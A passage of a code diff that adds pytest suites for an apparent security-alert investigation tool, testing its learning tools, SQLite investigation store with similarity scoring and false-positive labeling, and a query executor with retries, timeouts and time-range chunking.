+ assert result["count"] >= 1
+ assert len(result["queries"]) >= 1
+
+ # Check query structure
+ query = result["queries"][0]
+ assert "query_pattern" in query
+ assert "total_uses" in query
+ assert "success_rate" in query
+ assert "evidence_rate" in query
+
+ @pytest.mark.asyncio
+ async def test_get_effective_queries_filtered_by_alert(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test getting effective queries filtered by alert type."""
+ result = await populated_learning_tools.get_effective_queries(alert_name="HighCPUUsage")
+
+ # Should only return queries used for this alert
+ for query in result["queries"]:
+ assert "HighCPUUsage" in query["used_for_alerts"]
+
+ @pytest.mark.asyncio
+ async def test_get_effective_queries_respects_limit(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that get_effective_queries respects the limit."""
+ result = await populated_learning_tools.get_effective_queries(limit=1)
+
+ assert len(result["queries"]) <= 1
+
+ @pytest.mark.asyncio
+ async def test_get_effective_queries_includes_recommendation(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that results include a recommendation."""
+ result = await populated_learning_tools.get_effective_queries()
+
+ if result["found"]:
+ assert "recommendation" in result
+
+
+class TestCheckFalsePositivePattern:
+ """Tests for check_false_positive_pattern tool."""
+
+ @pytest.mark.asyncio
+ async def test_check_fp_no_history(self, learning_tools: LearningTools) -> None:
+ """Test checking FP pattern with no history."""
+ result = await learning_tools.check_false_positive_pattern(alert_name="NewAlert")
+
+ assert result["is_known_pattern"] is False
+ assert result["confidence"] == "low"
+ assert "No historical data" in result["message"]
+
+ @pytest.mark.asyncio
+ async def test_check_fp_with_history(self, populated_learning_tools: LearningTools) -> None:
+ """Test checking FP pattern with history."""
+ result = await populated_learning_tools.check_false_positive_pattern(
+ alert_name="HighCPUUsage"
+ )
+
+ assert "false_positive_rate" in result
+ assert "true_positives" in result or "is_known_pattern" in result
+
+ @pytest.mark.asyncio
+ async def test_check_fp_high_rate_detection(self, store: InvestigationStore) -> None:
+ """Test detection of high false positive rate."""
+ now = datetime.now(timezone.utc)
+
+ # Create mostly false positive investigations
+ for i in range(10):
+ inv = StoredInvestigation(
+ investigation_id=f"fp-inv-{i}",
+ alert_name="NoisyAlert",
+ alert_fingerprint="noisy-rule",
+ severity="low",
+ technique_id="T1000",
+ technique_name="Test",
+ started_at=now - timedelta(minutes=i),
+ completed_at=now,
+ duration_seconds=60.0,
+ status="completed",
+ evidence_count=0,
+ highest_pyramid_level=0,
+ techniques_identified=[],
+ queries_executed=[],
+ query_success_rate=0.0,
+ effective_queries=[],
+ is_true_positive=i < 2, # Only 2/10 true positives
+ )
+ store.store_investigation(inv)
+
+ tools = LearningTools(store=store)
+ result = await tools.check_false_positive_pattern(alert_name="NoisyAlert")
+
+ # Should detect high FP rate (80%)
+ assert "false_positive_rate" in result
+ # Either known pattern or has rate info
+ assert result.get("is_known_pattern") or "80%" in result.get("false_positive_rate", "")
+
+ @pytest.mark.asyncio
+ async def test_check_fp_with_fingerprint(self, populated_learning_tools: LearningTools) -> None:
+ """Test checking FP pattern with fingerprint."""
+ result = await populated_learning_tools.check_false_positive_pattern(
+ alert_name="HighCPUUsage",
+ alert_fingerprint="rule-cpu-001",
+ )
+
+ # Should use fingerprint for more accurate matching
+ assert "confidence" in result
+
+
+class TestGetInvestigationStatistics:
+ """Tests for get_investigation_statistics tool."""
+
+ @pytest.mark.asyncio
+ async def test_get_statistics_empty_store(self, learning_tools: LearningTools) -> None:
+ """Test getting statistics from empty store."""
+ result = await learning_tools.get_investigation_statistics()
+
+ assert result["total_investigations"] == 0
+
+ @pytest.mark.asyncio
+ async def test_get_statistics_with_data(self, populated_learning_tools: LearningTools) -> None:
+ """Test getting statistics with data."""
+ result = await populated_learning_tools.get_investigation_statistics()
+
+ assert result["total_investigations"] >= 1
+ assert "status_distribution" in result
+ assert "performance" in result
+ assert "query_insights" in result
+ assert "labeling" in result
+
+ @pytest.mark.asyncio
+ async def test_get_statistics_performance_metrics(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that statistics include performance metrics."""
+ result = await populated_learning_tools.get_investigation_statistics()
+
+ perf = result["performance"]
+ assert "avg_evidence_count" in perf
+ assert "avg_pyramid_level" in perf
+ assert "avg_duration_seconds" in perf
+
+ @pytest.mark.asyncio
+ async def test_get_statistics_labeling_info(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that statistics include labeling information."""
+ result = await populated_learning_tools.get_investigation_statistics()
+
+ labeling = result["labeling"]
+ assert "true_positives" in labeling
+ assert "false_positives" in labeling
+ # true_positive_rate may be None or a value
+ assert "true_positive_rate" in labeling
+
+
+class TestGuidanceGeneration:
+ """Tests for guidance generation helper."""
+
+ @pytest.mark.asyncio
+ async def test_guidance_with_effective_queries(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test guidance includes effective query suggestions."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage"
+ )
+
+ # Guidance should mention queries if available
+ if result["found"]:
+ guidance = result["guidance"]
+ # Should have some guidance text
+ assert len(guidance) > 0
+
+ @pytest.mark.asyncio
+ async def test_guidance_with_high_tp_rate(self, store: InvestigationStore) -> None:
+ """Test guidance for high true positive rate alerts."""
+ now = datetime.now(timezone.utc)
+
+ # Create mostly true positive investigations
+ for i in range(5):
+ inv = StoredInvestigation(
+ investigation_id=f"tp-inv-{i}",
+ alert_name="CriticalAlert",
+ alert_fingerprint="critical-rule",
+ severity="critical",
+ technique_id="T1000",
+ technique_name="Test",
+ started_at=now - timedelta(minutes=i),
+ completed_at=now,
+ duration_seconds=600.0,
+ status="completed",
+ evidence_count=5,
+ highest_pyramid_level=3,
+ techniques_identified=["T1000"],
+ queries_executed=[],
+ query_success_rate=0.8,
+ effective_queries=["{job='test'}"],
+ is_true_positive=True, # All true positives
+ )
+ store.store_investigation(inv)
+
+ tools = LearningTools(store=store)
+ result = await tools.find_similar_investigations(alert_name="CriticalAlert")
+
+ assert result["found"] is True
+ # Should mention high TP rate in guidance
+ guidance = result["guidance"]
+ assert "true positive" in guidance.lower() or "thorough" in guidance.lower()
+
+
+class TestEdgeCases:
+ """Tests for edge cases."""
+
+ @pytest.mark.asyncio
+ async def test_find_similar_with_all_none_params(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test find_similar with all None parameters."""
+ result = await populated_learning_tools.find_similar_investigations()
+
+ # Should still return results (recent investigations)
+ # or indicate no similar found
+ assert "found" in result
+
+ @pytest.mark.asyncio
+ async def test_unicode_in_alert_name(self, store: InvestigationStore) -> None:
+ """Test handling of unicode in alert names."""
+ now = datetime.now(timezone.utc)
+
+ inv = StoredInvestigation(
+ investigation_id="unicode-inv",
+ alert_name="Alert \u2603 Snowman", # Unicode snowman
+ alert_fingerprint="unicode-rule",
+ severity="low",
+ technique_id=None,
+ technique_name=None,
+ started_at=now,
+ completed_at=now,
+ duration_seconds=60.0,
+ status="completed",
+ evidence_count=0,
+ highest_pyramid_level=0,
+ techniques_identified=[],
+ queries_executed=[],
+ query_success_rate=0.0,
+ effective_queries=[],
+ )
+ store.store_investigation(inv)
+
+ tools = LearningTools(store=store)
+ result = await tools.find_similar_investigations(alert_name="Alert \u2603 Snowman")
+
+ assert result["found"] is True
+
+ @pytest.mark.asyncio
+ async def test_very_long_query_pattern(self, store: InvestigationStore) -> None:
+ """Test handling of very long query patterns."""
+ long_query = "{job='test'}" + " |= 'x'" * 100
+
+ for _ in range(3):
+ store.update_query_effectiveness(
+ query_pattern=long_query,
+ successful=True,
+ produced_evidence=True,
+ alert_type="TestAlert",
+ )
+
+ tools = LearningTools(store=store)
+ result = await tools.get_effective_queries()
+
+ # Should handle long queries without error
+ assert result["found"] is True
diff --git a/tests/test_persistence.py b/tests/test_persistence.py
new file mode 100644
index 00000000..996240fc
--- /dev/null
+++ b/tests/test_persistence.py
@@ -0,0 +1,537 @@
+"""Tests for the Investigation Persistence and Learning System."""
+
+import tempfile
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+import pytest
+
+from ares.core.persistence import (
+ InvestigationStore,
+ QueryEffectiveness,
+ StoredInvestigation,
+ get_investigation_store,
+ reset_investigation_store,
+)
+
+
+@pytest.fixture
+def temp_db() -> Path:
+ """Create a temporary database file."""
+ with tempfile.TemporaryDirectory() as tmpdir:
+ yield Path(tmpdir) / "test_investigations.db"
+
+
+@pytest.fixture
+def store(temp_db: Path) -> InvestigationStore:
+ """Create a fresh investigation store."""
+ return InvestigationStore(temp_db)
+
+
+@pytest.fixture
+def sample_investigation() -> StoredInvestigation:
+ """Create a sample investigation for testing."""
+ now = datetime.now(timezone.utc)
+ return StoredInvestigation(
+ investigation_id="inv-001",
+ alert_name="HighCPUUsage",
+ alert_fingerprint="rule-123",
+ severity="warning",
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ started_at=now - timedelta(minutes=10),
+ completed_at=now,
+ duration_seconds=600.0,
+ status="completed",
+ evidence_count=5,
+ highest_pyramid_level=3,
+ techniques_identified=["T1059.001", "T1086"],
+ queries_executed=[
+ {"query": "{job='windows'}", "result_count": 10},
+ {"query": "{job='linux'}", "result_count": 0},
+ ],
+ query_success_rate=0.5,
+ effective_queries=["{job='windows'}"],
+ is_true_positive=True,
+ analyst_notes="Confirmed malicious activity",
+ metadata={"host": "server01", "user": "admin"},
+ )
+
+
+class TestStoredInvestigation:
+ """Tests for StoredInvestigation dataclass."""
+
+ def test_to_dict(self, sample_investigation: StoredInvestigation) -> None:
+ """Test conversion to dictionary."""
+ data = sample_investigation.to_dict()
+
+ assert data["investigation_id"] == "inv-001"
+ assert data["alert_name"] == "HighCPUUsage"
+ assert data["severity"] == "warning"
+ assert data["technique_id"] == "T1059.001"
+ assert data["status"] == "completed"
+ assert data["evidence_count"] == 5
+ assert data["is_true_positive"] is True
+ assert "started_at" in data
+ assert "completed_at" in data
+
+ def test_from_dict(self, sample_investigation: StoredInvestigation) -> None:
+ """Test creation from dictionary."""
+ data = sample_investigation.to_dict()
+ restored = StoredInvestigation.from_dict(data)
+
+ assert restored.investigation_id == sample_investigation.investigation_id
+ assert restored.alert_name == sample_investigation.alert_name
+ assert restored.severity == sample_investigation.severity
+ assert restored.technique_id == sample_investigation.technique_id
+ assert restored.status == sample_investigation.status
+ assert restored.evidence_count == sample_investigation.evidence_count
+ assert restored.is_true_positive == sample_investigation.is_true_positive
+
+ def test_from_dict_with_missing_optional_fields(self) -> None:
+ """Test creation from dict with missing optional fields."""
+ minimal_data = {
+ "investigation_id": "inv-min",
+ "alert_name": "TestAlert",
+ "alert_fingerprint": "fp-001",
+ "severity": "low",
+ "started_at": datetime.now(timezone.utc).isoformat(),
+ "completed_at": datetime.now(timezone.utc).isoformat(),
+ "duration_seconds": 100.0,
+ "status": "completed",
+ "evidence_count": 0,
+ "highest_pyramid_level": 0,
+ }
+
+ investigation = StoredInvestigation.from_dict(minimal_data)
+
+ assert investigation.investigation_id == "inv-min"
+ assert investigation.technique_id is None
+ assert investigation.techniques_identified == []
+ assert investigation.queries_executed == []
+ assert investigation.is_true_positive is None
+
+
+class TestQueryEffectiveness:
+ """Tests for QueryEffectiveness dataclass."""
+
+ def test_success_rate_calculation(self) -> None:
+ """Test success rate property."""
+ qe = QueryEffectiveness(
+ query_pattern="{job='test'}",
+ total_executions=10,
+ successful_executions=7,
+ evidence_producing=3,
+ alert_types=["AlertA"],
+ )
+
+ assert qe.success_rate == 0.7
+
+ def test_evidence_rate_calculation(self) -> None:
+ """Test evidence rate property."""
+ qe = QueryEffectiveness(
+ query_pattern="{job='test'}",
+ total_executions=10,
+ successful_executions=7,
+ evidence_producing=3,
+ alert_types=["AlertA"],
+ )
+
+ assert qe.evidence_rate == 0.3
+
+ def test_zero_executions(self) -> None:
+ """Test rates with zero executions."""
+ qe = QueryEffectiveness(
+ query_pattern="{job='test'}",
+ total_executions=0,
+ successful_executions=0,
+ evidence_producing=0,
+ alert_types=[],
+ )
+
+ assert qe.success_rate == 0.0
+ assert qe.evidence_rate == 0.0
+
+
+class TestInvestigationStore:
+ """Tests for InvestigationStore."""
+
+ def test_init_creates_schema(self, store: InvestigationStore) -> None:
+ """Test that schema is created on init."""
+ with store._get_connection() as conn:
+ cursor = conn.cursor()
+
+ # Check investigations table exists
+ cursor.execute(
+ "SELECT name FROM sqlite_master WHERE type='table' AND name='investigations'"
+ )
+ assert cursor.fetchone() is not None
+
+ # Check query_effectiveness table exists
+ cursor.execute(
+ "SELECT name FROM sqlite_master WHERE type='table' AND name='query_effectiveness'"
+ )
+ assert cursor.fetchone() is not None
+
+ # Check schema_info table exists
+ cursor.execute(
+ "SELECT name FROM sqlite_master WHERE type='table' AND name='schema_info'"
+ )
+ assert cursor.fetchone() is not None
+
+ def test_store_and_retrieve_investigation(
+ self, store: InvestigationStore, sample_investigation: StoredInvestigation
+ ) -> None:
+ """Test storing and retrieving an investigation."""
+ store.store_investigation(sample_investigation)
+
+ retrieved = store.get_investigation(sample_investigation.investigation_id)
+
+ assert retrieved is not None
+ assert retrieved.investigation_id == sample_investigation.investigation_id
+ assert retrieved.alert_name == sample_investigation.alert_name
+ assert retrieved.evidence_count == sample_investigation.evidence_count
+ assert retrieved.is_true_positive == sample_investigation.is_true_positive
+
+ def test_get_nonexistent_investigation(self, store: InvestigationStore) -> None:
+ """Test retrieving a non-existent investigation."""
+ result = store.get_investigation("nonexistent-id")
+ assert result is None
+
+ def test_store_investigation_upsert(
+ self, store: InvestigationStore, sample_investigation: StoredInvestigation
+ ) -> None:
+ """Test that storing an investigation twice updates it."""
+ store.store_investigation(sample_investigation)
+
+ # Modify and store again
+ sample_investigation.evidence_count = 10
+ sample_investigation.status = "escalated"
+ store.store_investigation(sample_investigation)
+
+ retrieved = store.get_investigation(sample_investigation.investigation_id)
+
+ assert retrieved is not None
+ assert retrieved.evidence_count == 10
+ assert retrieved.status == "escalated"
+
+ def test_find_similar_investigations_by_fingerprint(
+ self, store: InvestigationStore, sample_investigation: StoredInvestigation
+ ) -> None:
+ """Test finding similar investigations by fingerprint."""
+ store.store_investigation(sample_investigation)
+
+ similar = store.find_similar_investigations(
+ alert_fingerprint=sample_investigation.alert_fingerprint
+ )
+
+ assert len(similar) == 1
+ assert similar[0].investigation.investigation_id == sample_investigation.investigation_id
+ assert "same_alert_fingerprint" in similar[0].matching_factors
+
+ def test_find_similar_investigations_by_technique(self, store: InvestigationStore) -> None:
+ """Test finding similar investigations by technique."""
+ now = datetime.now(timezone.utc)
+
+ # Create multiple investigations with same technique
+ for i in range(3):
+ inv = StoredInvestigation(
+ investigation_id=f"inv-{i}",
+ alert_name=f"Alert{i}",
+ alert_fingerprint=f"fp-{i}",
+ severity="warning",
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ started_at=now - timedelta(minutes=10),
+ completed_at=now,
+ duration_seconds=600.0,
+ status="completed",
+ evidence_count=i,
+ highest_pyramid_level=i,
+ techniques_identified=["T1059.001"],
+ queries_executed=[],
+ query_success_rate=0.5,
+ effective_queries=[],
+ )
+ store.store_investigation(inv)
+
+ similar = store.find_similar_investigations(technique_id="T1059.001")
+
+ assert len(similar) == 3
+ for sim in similar:
+ assert "same_technique" in sim.matching_factors
+
+ def test_find_similar_investigations_no_criteria(
+ self, store: InvestigationStore, sample_investigation: StoredInvestigation
+ ) -> None:
+ """Test finding similar investigations with no criteria returns recent."""
+ store.store_investigation(sample_investigation)
+
+ # Should return recent investigations
+ similar = store.find_similar_investigations()
+
+ assert len(similar) >= 0 # May be empty or have results
+
+ def test_find_similar_investigations_multiple_criteria(
+ self, store: InvestigationStore, sample_investigation: StoredInvestigation
+ ) -> None:
+ """Test finding similar investigations with multiple criteria."""
+ store.store_investigation(sample_investigation)
+
+ similar = store.find_similar_investigations(
+ alert_name=sample_investigation.alert_name,
+ technique_id=sample_investigation.technique_id,
+ severity=sample_investigation.severity,
+ )
+
+ assert len(similar) == 1
+ # alert_name (0.3) + technique (0.15) + severity (0.05) = 0.5
+ # Use > 0.49 to account for floating-point precision
+ assert similar[0].similarity_score > 0.49 # Should have high score with multiple matches
+
+ def test_update_query_effectiveness_new_query(self, store: InvestigationStore) -> None:
+ """Test updating effectiveness for a new query."""
+ store.update_query_effectiveness(
+ query_pattern="{job='test'}",
+ successful=True,
+ produced_evidence=True,
+ alert_type="TestAlert",
+ )
+
+ effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10)
+
+ # May not appear if total_executions < 3 threshold
+ # Let's add more executions
+ for _ in range(2):
+ store.update_query_effectiveness(
+ query_pattern="{job='test'}",
+ successful=True,
+ produced_evidence=True,
+ alert_type="TestAlert",
+ )
+
+ effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10)
+ assert len(effective) == 1
+ assert effective[0].query_pattern == "{job='test'}"
+ assert effective[0].total_executions == 3
+
+ def test_update_query_effectiveness_existing_query(self, store: InvestigationStore) -> None:
+ """Test updating effectiveness for an existing query."""
+ # Add initial record
+ for _ in range(3):
+ store.update_query_effectiveness(
+ query_pattern="{job='existing'}",
+ successful=True,
+ produced_evidence=False,
+ alert_type="AlertA",
+ )
+
+ # Update with evidence
+ store.update_query_effectiveness(
+ query_pattern="{job='existing'}",
+ successful=True,
+ produced_evidence=True,
+ alert_type="AlertB",
+ )
+
+ effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10)
+ matching = [q for q in effective if q.query_pattern == "{job='existing'}"]
+
+ assert len(matching) == 1
+ assert matching[0].total_executions == 4
+ assert matching[0].evidence_producing == 1
+ assert "AlertA" in matching[0].alert_types
+ assert "AlertB" in matching[0].alert_types
+
+ def test_get_effective_queries_filtered_by_alert_type(self, store: InvestigationStore) -> None:
+ """Test getting effective queries filtered by alert type."""
+ # Add queries for different alert types
+ for _ in range(3):
+ store.update_query_effectiveness(
+ query_pattern="{job='alert_a'}",
+ successful=True,
+ produced_evidence=True,
+ alert_type="AlertA",
+ )
+ store.update_query_effectiveness(
+ query_pattern="{job='alert_b'}",
+ successful=True,
+ produced_evidence=True,
+ alert_type="AlertB",
+ )
+
+ effective_a = store.get_effective_queries(alert_type="AlertA", min_evidence_rate=0.0)
+ effective_b = store.get_effective_queries(alert_type="AlertB", min_evidence_rate=0.0)
+
+ assert len(effective_a) == 1
+ assert effective_a[0].query_pattern == "{job='alert_a'}"
+ assert len(effective_b) == 1
+ assert effective_b[0].query_pattern == "{job='alert_b'}"
+
+ def test_get_statistics(
+ self, store: InvestigationStore, sample_investigation: StoredInvestigation
+ ) -> None:
+ """Test getting overall statistics."""
+ store.store_investigation(sample_investigation)
+
+ stats = store.get_statistics()
+
+ assert stats["total_investigations"] == 1
+ assert "completed" in stats["status_distribution"]
+ assert stats["avg_evidence_count"] == 5.0
+ assert stats["labeling"]["true_positives"] == 1
+ assert stats["labeling"]["false_positives"] == 0
+
+ def test_get_statistics_empty_store(self, store: InvestigationStore) -> None:
+ """Test getting statistics from empty store."""
+ stats = store.get_statistics()
+
+ assert stats["total_investigations"] == 0
+ assert stats["avg_evidence_count"] == 0
+ assert stats["labeling"]["true_positives"] == 0
+
+ def test_label_investigation(
+ self, store: InvestigationStore, sample_investigation: StoredInvestigation
+ ) -> None:
+ """Test labeling an investigation."""
+ sample_investigation.is_true_positive = None
+ store.store_investigation(sample_investigation)
+
+ # Label as false positive
+ result = store.label_investigation(
+ investigation_id=sample_investigation.investigation_id,
+ is_true_positive=False,
+ analyst_notes="Benign activity",
+ )
+
+ assert result is True
+
+ retrieved = store.get_investigation(sample_investigation.investigation_id)
+ assert retrieved is not None
+ assert retrieved.is_true_positive is False
+ assert retrieved.analyst_notes == "Benign activity"
+
+ def test_label_nonexistent_investigation(self, store: InvestigationStore) -> None:
+ """Test labeling a non-existent investigation."""
+ result = store.label_investigation(
+ investigation_id="nonexistent",
+ is_true_positive=True,
+ )
+
+ assert result is False
+
+ def test_get_false_positive_patterns(self, store: InvestigationStore) -> None:
+ """Test getting false positive patterns."""
+ now = datetime.now(timezone.utc)
+
+ # Create multiple false positive investigations with same fingerprint
+ for i in range(5):
+ inv = StoredInvestigation(
+ investigation_id=f"fp-inv-{i}",
+ alert_name="NoisyAlert",
+ alert_fingerprint="noisy-rule-001",
+ severity="low",
+ technique_id="T1000",
+ technique_name="Test",
+ started_at=now - timedelta(minutes=10),
+ completed_at=now,
+ duration_seconds=60.0,
+ status="completed",
+ evidence_count=0,
+ highest_pyramid_level=0,
+ techniques_identified=[],
+ queries_executed=[],
+ query_success_rate=0.0,
+ effective_queries=[],
+ is_true_positive=False,
+ )
+ store.store_investigation(inv)
+
+ patterns = store.get_false_positive_patterns(min_occurrences=3)
+
+ assert len(patterns) >= 1
+ noisy_pattern = next((p for p in patterns if p["alert_name"] == "NoisyAlert"), None)
+ assert noisy_pattern is not None
+ assert noisy_pattern["occurrences"] >= 3
+
+
+class TestGlobalStore:
+ """Tests for global store functions."""
+
+ def test_get_investigation_store_creates_default(self) -> None:
+ """Test that get_investigation_store creates a default store."""
+ reset_investigation_store()
+
+ with tempfile.TemporaryDirectory() as tmpdir:
+ db_path = Path(tmpdir) / "test.db"
+ store = get_investigation_store(db_path)
+
+ assert store is not None
+ assert store.db_path == db_path
+
+ reset_investigation_store()
+
+ def test_get_investigation_store_returns_same_instance(self) -> None:
+ """Test that get_investigation_store returns the same instance."""
+ reset_investigation_store()
+
+ with tempfile.TemporaryDirectory() as tmpdir:
+ db_path = Path(tmpdir) / "test.db"
+ store1 = get_investigation_store(db_path)
+ store2 = get_investigation_store()
+
+ assert store1 is store2
+
+ reset_investigation_store()
+
+ def test_reset_investigation_store(self) -> None:
+ """Test resetting the global store."""
+ reset_investigation_store()
+
+ with tempfile.TemporaryDirectory() as tmpdir:
+ db_path = Path(tmpdir) / "test.db"
+ store1 = get_investigation_store(db_path)
+ reset_investigation_store()
+
+ # After reset, a new call should create new instance
+ store2 = get_investigation_store(db_path)
+
+ assert store1 is not store2
+
+ reset_investigation_store()
+
+
+class TestSimilarityScoring:
+ """Tests for similarity calculation."""
+
+ def test_similarity_score_all_factors(
+ self, store: InvestigationStore, sample_investigation: StoredInvestigation
+ ) -> None:
+ """Test similarity score with all matching factors."""
+ store.store_investigation(sample_investigation)
+
+ similar = store.find_similar_investigations(
+ alert_name=sample_investigation.alert_name,
+ alert_fingerprint=sample_investigation.alert_fingerprint,
+ technique_id=sample_investigation.technique_id,
+ severity=sample_investigation.severity,
+ )
+
+ assert len(similar) == 1
+ # 0.5 (fingerprint) + 0.3 (name) + 0.15 (technique) + 0.05 (severity) = 1.0
+ assert similar[0].similarity_score == 1.0
+ assert len(similar[0].matching_factors) == 4
+
+ def test_similarity_score_partial_match(
+ self, store: InvestigationStore, sample_investigation: StoredInvestigation
+ ) -> None:
+ """Test similarity score with partial match."""
+ store.store_investigation(sample_investigation)
+
+ similar = store.find_similar_investigations(
+ technique_id=sample_investigation.technique_id,
+ )
+
+ assert len(similar) == 1
+ assert similar[0].similarity_score == 0.15
+ assert similar[0].matching_factors == ["same_technique"]
diff --git a/tests/test_query_resilience.py b/tests/test_query_resilience.py
new file mode 100644
index 00000000..2bd12438
--- /dev/null
+++ b/tests/test_query_resilience.py
@@ -0,0 +1,516 @@
+"""Tests for the Query Resilience module."""
+
+import asyncio
+from typing import Any
+from unittest.mock import AsyncMock
+
+import pytest
+
+from ares.core.query_resilience import (
+ QueryAttempt,
+ QueryResilientExecutor,
+ QueryStats,
+ get_resilient_executor,
+ reset_resilient_executor,
+)
+
+
+class TestQueryAttempt:
+ """Tests for QueryAttempt dataclass."""
+
+ def test_create_successful_attempt(self) -> None:
+ """Test creating a successful query attempt."""
+ attempt = QueryAttempt(
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T11:00:00Z",
+ attempt_number=1,
+ success=True,
+ result_count=100,
+ duration_ms=500,
+ )
+
+ assert attempt.success is True
+ assert attempt.error is None
+ assert attempt.result_count == 100
+
+ def test_create_failed_attempt(self) -> None:
+ """Test creating a failed query attempt."""
+ attempt = QueryAttempt(
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T11:00:00Z",
+ attempt_number=2,
+ success=False,
+ error="Timeout after 30s",
+ duration_ms=30000,
+ )
+
+ assert attempt.success is False
+ assert attempt.error == "Timeout after 30s"
+ assert attempt.result_count == 0
+
+
+class TestQueryStats:
+ """Tests for QueryStats dataclass."""
+
+ def test_default_values(self) -> None:
+ """Test default values for QueryStats."""
+ stats = QueryStats()
+
+ assert stats.total_attempts == 0
+ assert stats.successful_attempts == 0
+ assert stats.timeout_count == 0
+ assert stats.retry_count == 0
+ assert stats.time_range_reductions == 0
+ assert stats.attempts == []
+
+ def test_success_rate_calculation(self) -> None:
+ """Test success rate calculation."""
+ stats = QueryStats(total_attempts=10, successful_attempts=7)
+
+ assert stats.success_rate == 0.7
+
+ def test_success_rate_zero_attempts(self) -> None:
+ """Test success rate with zero attempts."""
+ stats = QueryStats(total_attempts=0, successful_attempts=0)
+
+ assert stats.success_rate == 0.0
+
+
+class TestQueryResilientExecutor:
+ """Tests for QueryResilientExecutor."""
+
+ def test_init_default_values(self) -> None:
+ """Test default initialization values."""
+ executor = QueryResilientExecutor()
+
+ assert executor.max_retries == 3
+ assert executor.initial_timeout == 30.0
+ assert executor.enable_chunking is True
+ assert executor.chunk_size_minutes == 30
+
+ def test_init_custom_values(self) -> None:
+ """Test initialization with custom values."""
+ executor = QueryResilientExecutor(
+ max_retries=5,
+ initial_timeout=60.0,
+ enable_chunking=False,
+ chunk_size_minutes=15,
+ )
+
+ assert executor.max_retries == 5
+ assert executor.initial_timeout == 60.0
+ assert executor.enable_chunking is False
+ assert executor.chunk_size_minutes == 15
+
+ @pytest.mark.asyncio
+ async def test_execute_with_resilience_success(self) -> None:
+ """Test successful query execution."""
+ executor = QueryResilientExecutor()
+
+ mock_query_fn = AsyncMock(
+ return_value={
+ "status": "success",
+ "data": {"result": [{"values": [[1, "log1"], [2, "log2"]]}]},
+ }
+ )
+
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T11:00:00Z",
+ )
+
+ assert result["status"] == "success"
+ assert "_resilience_metadata" in result
+ assert result["_resilience_metadata"]["retry_count"] == 0
+ assert executor.stats.successful_attempts == 1
+
+ @pytest.mark.asyncio
+ async def test_execute_with_resilience_timeout_retry(self) -> None:
+ """Test retry behavior on timeout."""
+ executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1)
+
+ call_count = 0
+
+ async def timeout_then_success(**kwargs: Any) -> dict[str, Any]:
+ nonlocal call_count
+ call_count += 1
+ if call_count < 2:
+ await asyncio.sleep(1) # Will timeout
+ return {"status": "success", "data": {"result": []}}
+
+ mock_query_fn = AsyncMock(side_effect=timeout_then_success)
+
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T10:30:00Z",
+ )
+
+ assert result["status"] == "success"
+ assert executor.stats.timeout_count >= 1
+
+ @pytest.mark.asyncio
+ async def test_execute_with_resilience_all_retries_fail(self) -> None:
+ """Test behavior when all retries fail."""
+ executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1)
+
+ async def always_timeout(**kwargs: Any) -> dict[str, Any]:
+ await asyncio.sleep(1) # Always timeout
+ return {"status": "success", "data": {"result": []}}
+
+ mock_query_fn = AsyncMock(side_effect=always_timeout)
+
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T10:30:00Z",
+ )
+
+ assert result["status"] == "error"
+ assert "suggestion" in result
+ assert executor.stats.timeout_count > 0
+
+ @pytest.mark.asyncio
+ async def test_execute_with_resilience_error_response(self) -> None:
+ """Test handling of error responses from query function."""
+ executor = QueryResilientExecutor(max_retries=2)
+
+ mock_query_fn = AsyncMock(
+ return_value={
+ "status": "error",
+ "error": "timeout exceeded while executing query",
+ }
+ )
+
+ await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T10:30:00Z",
+ )
+
+ # Should retry on timeout errors
+ assert executor.stats.timeout_count > 0
+
+ @pytest.mark.asyncio
+ async def test_execute_with_resilience_time_range_reduction(self) -> None:
+ """Test time range reduction on persistent failures."""
+ executor = QueryResilientExecutor(max_retries=1, initial_timeout=0.05)
+
+ call_count = 0
+ received_time_ranges: list[tuple[str, str]] = []
+
+ async def track_time_ranges(**kwargs: Any) -> dict[str, Any]:
+ nonlocal call_count
+ call_count += 1
+ received_time_ranges.append((kwargs.get("start_time", ""), kwargs.get("end_time", "")))
+
+ # Fail first few, succeed later with smaller range
+ if call_count < 3:
+ await asyncio.sleep(1) # Timeout
+ return {"status": "success", "data": {"result": []}}
+
+ mock_query_fn = AsyncMock(side_effect=track_time_ranges)
+
+ await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T11:00:00Z",
+ )
+
+ # Should have reduced time range at some point
+ assert executor.stats.time_range_reductions > 0
+
+ @pytest.mark.asyncio
+ async def test_execute_chunked_for_large_range(self) -> None:
+ """Test that large time ranges trigger chunked execution."""
+ executor = QueryResilientExecutor(chunk_size_minutes=30)
+
+ call_times: list[str] = []
+
+ async def track_chunks(**kwargs: Any) -> dict[str, Any]:
+ call_times.append(kwargs.get("start_time", ""))
+ return {"status": "success", "data": {"result": [{"values": [[1, "log"]]}]}}
+
+ mock_query_fn = AsyncMock(side_effect=track_chunks)
+
+ # 3 hour range should trigger chunking
